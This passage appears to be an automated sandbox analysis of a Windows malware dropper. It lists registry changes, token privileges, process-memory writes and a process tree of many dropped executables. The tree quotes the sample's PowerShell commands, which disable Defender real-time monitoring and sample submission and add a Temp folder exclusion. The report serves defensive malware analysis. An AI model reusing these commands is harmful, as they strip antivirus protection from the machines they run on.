\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe -
Modifies registry class 7 IoCs
Processes:
Calculator.exeCalculator.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{F47242D6-599C-4903-A69D-0890AF561543} Calculator.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{97D59D83-49ED-4351-8107-6E9CF1655674} Calculator.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ -
Processes:
installer.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exeSat1637cdb9d96.exeSat1600f41eca.exepid process 4512 powershell.exe 4512 powershell.exe 3420 powershell.exe 3420 powershell.exe 1432 Sat1637cdb9d96.exe 1432 Sat1637cdb9d96.exe 1432 Sat1637cdb9d96.exe 1432 Sat1637cdb9d96.exe 1432 Sat1637cdb9d96.exe 1432 Sat1637cdb9d96.exe 1432 Sat1637cdb9d96.exe 1432 Sat1637cdb9d96.exe 3060 Sat1600f41eca.exe 3060 Sat1600f41eca.exe 3060 Sat1600f41eca.exe 3060 Sat1600f41eca.exe 3060 Sat1600f41eca.exe 3060 Sat1600f41eca.exe 3060 Sat1600f41eca.exe 3060 Sat1600f41eca.exe 1432 Sat1637cdb9d96.exe 1432 Sat1637cdb9d96.exe 3060 Sat1600f41eca.exe 3060 Sat1600f41eca.exe 1432 Sat1637cdb9d96.exe 1432 Sat1637cdb9d96.exe 3060 Sat1600f41eca.exe 3060 Sat1600f41eca.exe 1432 Sat1637cdb9d96.exe 1432 Sat1637cdb9d96.exe 3060 Sat1600f41eca.exe 3060 Sat1600f41eca.exe 1432 Sat1637cdb9d96.exe 1432 Sat1637cdb9d96.exe 3060 Sat1600f41eca.exe 3060 Sat1600f41eca.exe 1432 Sat1637cdb9d96.exe 1432 Sat1637cdb9d96.exe 3060 Sat1600f41eca.exe 3060 Sat1600f41eca.exe 1432 Sat1637cdb9d96.exe 1432 Sat1637cdb9d96.exe 3060 Sat1600f41eca.exe 3060 Sat1600f41eca.exe 1432 Sat1637cdb9d96.exe 1432 Sat1637cdb9d96.exe 3060 Sat1600f41eca.exe 3060 Sat1600f41eca.exe 1432 Sat1637cdb9d96.exe 1432 Sat1637cdb9d96.exe 3060 Sat1600f41eca.exe 3060 Sat1600f41eca.exe 1432 Sat1637cdb9d96.exe 1432 Sat1637cdb9d96.exe 3060 Sat1600f41eca.exe 3060 Sat1600f41eca.exe 1432 Sat1637cdb9d96.exe 3060 Sat1600f41eca.exe 1432 Sat1637cdb9d96.exe 3060 Sat1600f41eca.exe 1432 Sat1637cdb9d96.exe 3060 Sat1600f41eca.exe 3060 Sat1600f41eca.exe 1432 Sat1637cdb9d96.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
foldershare.exepid process 3208 8016 foldershare.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
fBp6HqC0_TNfSR_tIpttHvQC.exe4BF9.exepid process 6316 fBp6HqC0_TNfSR_tIpttHvQC.exe 9844 4BF9.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs
Processes:
msedge.exepid process 932 msedge.exe 932 msedge.exe 932 msedge.exe 932 msedge.exe 932 msedge.exe 932 msedge.exe 932 msedge.exe 932 msedge.exe 932 msedge.exe 932 msedge.exe 932 msedge.exe 932 msedge.exe 932 msedge.exe 932 msedge.exe 932 msedge.exe 932 msedge.exe 932 msedge.exe 932 msedge.exe 932 msedge.exe 932 msedge.exe 932 msedge.exe -
Suspicious behavior: SetClipboardViewer 3 IoCs
Processes:
7008547.exe4421256.execlip.exepid process 5456 7008547.exe 5432 4421256.exe 6472 clip.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
svchost.exesvchost.exeSat160ff2e199851.exeSat163af1aa81.exepowershell.exepowershell.exeSat162b769f285d4a78.exetaskkill.exeOLyCAAaDhlJD4xz9ygf7NwsA.exedescription pid process Token: SeShutdownPrivilege 2072 svchost.exe Token: SeCreatePagefilePrivilege 2072 svchost.exe Token: SeShutdownPrivilege 2072 svchost.exe Token: SeCreatePagefilePrivilege 2072 svchost.exe Token: SeShutdownPrivilege 2072 svchost.exe Token: SeCreatePagefilePrivilege 2072 svchost.exe Token: SeShutdownPrivilege 2140 svchost.exe Token: SeCreatePagefilePrivilege 2140 svchost.exe Token: SeCreateTokenPrivilege 4552 Sat160ff2e199851.exe Token: SeAssignPrimaryTokenPrivilege 4552 Sat160ff2e199851.exe Token: SeLockMemoryPrivilege 4552 Sat160ff2e199851.exe Token: SeIncreaseQuotaPrivilege 4552 Sat160ff2e199851.exe Token: SeMachineAccountPrivilege 4552 Sat160ff2e199851.exe Token: SeTcbPrivilege 4552 Sat160ff2e199851.exe Token: SeSecurityPrivilege 4552 Sat160ff2e199851.exe Token: SeTakeOwnershipPrivilege 4552 Sat160ff2e199851.exe Token: SeLoadDriverPrivilege 4552 Sat160ff2e199851.exe Token: SeSystemProfilePrivilege 4552 Sat160ff2e199851.exe Token: SeSystemtimePrivilege 4552 Sat160ff2e199851.exe Token: SeProfSingleProcessPrivilege 4552 Sat160ff2e199851.exe Token: SeIncBasePriorityPrivilege 4552 Sat160ff2e199851.exe Token: SeCreatePagefilePrivilege 4552 Sat160ff2e199851.exe Token: SeCreatePermanentPrivilege 4552 Sat160ff2e199851.exe Token: SeBackupPrivilege 4552 Sat160ff2e199851.exe Token: SeRestorePrivilege 4552 Sat160ff2e199851.exe Token: SeShutdownPrivilege 4552 Sat160ff2e199851.exe Token: SeDebugPrivilege 4552 Sat160ff2e199851.exe Token: SeAuditPrivilege 4552 Sat160ff2e199851.exe Token: SeSystemEnvironmentPrivilege 4552 Sat160ff2e199851.exe Token: SeChangeNotifyPrivilege 4552 Sat160ff2e199851.exe Token: SeRemoteShutdownPrivilege 4552 Sat160ff2e199851.exe Token: SeUndockPrivilege 4552 Sat160ff2e199851.exe Token: SeSyncAgentPrivilege 4552 Sat160ff2e199851.exe Token: SeEnableDelegationPrivilege 4552 Sat160ff2e199851.exe Token: SeManageVolumePrivilege 4552 Sat160ff2e199851.exe Token: SeImpersonatePrivilege 4552 Sat160ff2e199851.exe Token: SeCreateGlobalPrivilege 4552 Sat160ff2e199851.exe Token: 31 4552 Sat160ff2e199851.exe Token: 32 4552 Sat160ff2e199851.exe Token: 33 4552 Sat160ff2e199851.exe Token: 34 4552 Sat160ff2e199851.exe Token: 35 4552 Sat160ff2e199851.exe Token: SeDebugPrivilege 5016 Sat163af1aa81.exe Token: SeDebugPrivilege 3420 powershell.exe Token: SeDebugPrivilege 4512 powershell.exe Token: SeDebugPrivilege 3692 Sat162b769f285d4a78.exe Token: SeDebugPrivilege 1340 taskkill.exe Token: SeCreateTokenPrivilege 3720 OLyCAAaDhlJD4xz9ygf7NwsA.exe Token: SeAssignPrimaryTokenPrivilege 3720 OLyCAAaDhlJD4xz9ygf7NwsA.exe Token: SeLockMemoryPrivilege 3720 OLyCAAaDhlJD4xz9ygf7NwsA.exe Token: SeIncreaseQuotaPrivilege 3720 OLyCAAaDhlJD4xz9ygf7NwsA.exe Token: SeMachineAccountPrivilege 3720 OLyCAAaDhlJD4xz9ygf7NwsA.exe Token: SeTcbPrivilege 3720 OLyCAAaDhlJD4xz9ygf7NwsA.exe Token: SeSecurityPrivilege 3720 OLyCAAaDhlJD4xz9ygf7NwsA.exe Token: SeTakeOwnershipPrivilege 3720 OLyCAAaDhlJD4xz9ygf7NwsA.exe Token: SeLoadDriverPrivilege 3720 OLyCAAaDhlJD4xz9ygf7NwsA.exe Token: SeSystemProfilePrivilege 3720 OLyCAAaDhlJD4xz9ygf7NwsA.exe Token: SeSystemtimePrivilege 3720 OLyCAAaDhlJD4xz9ygf7NwsA.exe Token: SeProfSingleProcessPrivilege 3720 OLyCAAaDhlJD4xz9ygf7NwsA.exe Token: SeIncBasePriorityPrivilege 3720 OLyCAAaDhlJD4xz9ygf7NwsA.exe Token: SeCreatePagefilePrivilege 3720 OLyCAAaDhlJD4xz9ygf7NwsA.exe Token: SeCreatePermanentPrivilege 3720 OLyCAAaDhlJD4xz9ygf7NwsA.exe Token: SeBackupPrivilege 3720 OLyCAAaDhlJD4xz9ygf7NwsA.exe Token: SeRestorePrivilege 3720 OLyCAAaDhlJD4xz9ygf7NwsA.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
Sat169c60f22b8.tmpmsedge.exeinstaller.execlient32.exeCalculator.exervs.exemsiexec.exepid process 5268 Sat169c60f22b8.tmp 932 msedge.exe 6864 installer.exe 11424 client32.exe 15168 Calculator.exe 19044 rvs.exe 19492 msiexec.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
cmd.execmd.execmd.exepid process 7068 cmd.exe 10320 cmd.exe 14720 cmd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.exesvchost.exedescription pid process target process PID 5076 wrote to memory of 2184 5076 setup_x86_x64_install.exe setup_installer.exe PID 5076 wrote to memory of 2184 5076 setup_x86_x64_install.exe setup_installer.exe PID 5076 wrote to memory of 2184 5076 setup_x86_x64_install.exe setup_installer.exe PID 2184 wrote to memory of 3176 2184 setup_installer.exe setup_install.exe PID 2184 wrote to memory of 3176 2184 setup_installer.exe setup_install.exe PID 2184 wrote to memory of 3176 2184 setup_installer.exe setup_install.exe PID 3176 wrote to memory of 2620 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 2620 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 2620 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 2860 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 2860 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 2860 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 3336 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 3336 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 3336 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 2928 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 2928 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 2928 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 4948 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 4948 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 4948 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 2844 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 2844 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 2844 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 2516 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 2516 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 2516 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 3712 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 3712 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 3712 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 3316 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 3316 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 3316 3176 setup_install.exe cmd.exe PID 2860 wrote to memory of 3420 2860 cmd.exe powershell.exe PID 2860 wrote to memory of 3420 2860 cmd.exe powershell.exe PID 2860 wrote to memory of 3420 2860 cmd.exe powershell.exe PID 3336 wrote to memory of 3800 3336 cmd.exe Sat16dbfd538b0b.exe PID 3336 wrote to memory of 3800 3336 cmd.exe Sat16dbfd538b0b.exe PID 3176 wrote to memory of 4020 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 4020 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 4020 3176 setup_install.exe cmd.exe PID 2620 wrote to memory of 4512 2620 cmd.exe powershell.exe PID 2620 wrote to memory of 4512 2620 cmd.exe powershell.exe PID 2620 wrote to memory of 4512 2620 cmd.exe powershell.exe PID 3176 wrote to memory of 1492 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 1492 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 1492 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 3048 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 3048 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 3048 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 3732 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 3732 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 3732 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 2000 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 2000 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 2000 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 4120 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 4120 3176 setup_install.exe cmd.exe PID 3176 wrote to memory of 4120 3176 setup_install.exe cmd.exe PID 3712 wrote to memory of 3060 3712 cmd.exe Sat1600f41eca.exe PID 3712 wrote to memory of 3060 3712 cmd.exe Sat1600f41eca.exe PID 3712 wrote to memory of 3060 3712 cmd.exe Sat1600f41eca.exe PID 2140 wrote to memory of 2908 2140 svchost.exe MoUsoCoreWorker.exe PID 2140 wrote to memory of 2908 2140 svchost.exe MoUsoCoreWorker.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat16dbfd538b0b.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16dbfd538b0b.exeSat16dbfd538b0b.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat163af1aa81.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat163af1aa81.exeSat163af1aa81.exe5⤵
- Executes dropped EXE
